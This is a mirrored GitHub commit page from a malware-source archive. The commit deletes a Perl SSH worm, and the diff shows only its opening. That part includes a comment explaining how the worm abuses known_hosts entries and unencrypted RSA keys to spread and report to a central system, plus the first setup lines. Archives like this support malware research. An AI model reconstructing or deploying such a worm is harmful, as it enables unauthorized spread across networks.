mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-15 23:39:23 +00:00
Delete Virus.Perl.SSHWorm
na
This commit is contained in:
vxunderground
GitHub
@@ -1,56 +0,0 @@
|
|||||||
###############
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
##
|
|
||||||
|
|
||||||
# sshworm - example of a trusted host/key ssh worm
|
|
||||||
|
|
||||||
#
|
|
||||||
|
|
||||||
# This is extremely primitive and rarely works on anything
|
|
||||||
|
|
||||||
# but identical systems running the same versions of ssh.
|
|
||||||
|
|
||||||
# It does show how using unencrypted RSA keys for user auth
|
|
||||||
|
|
||||||
# across an enterprise can be a really bad thing. Eventually
|
|
||||||
|
|
||||||
# you should be able to let this guy go running as root on any
|
|
||||||
|
|
||||||
# given system, it will locate each user's known_hosts and
|
|
||||||
|
|
||||||
# attempt to gain accesss, reporting its path to a central system.
|
|
||||||
|
|
||||||
#
|
|
||||||
|
|
||||||
##
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
use FindBin qw{$Bin};
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
print ":: sshworm initialized at $Bin\n";
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
$options = " -o PasswordAuthentication=no ";
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
##
|
|
||||||
|
|
||||||
# stage 1 - attempt to connect to all hosts in known_hosts files
|
|
||||||
|
|
||||||
##
|
|
||||||
|
|
||||||
Reference in New Issue
Block a user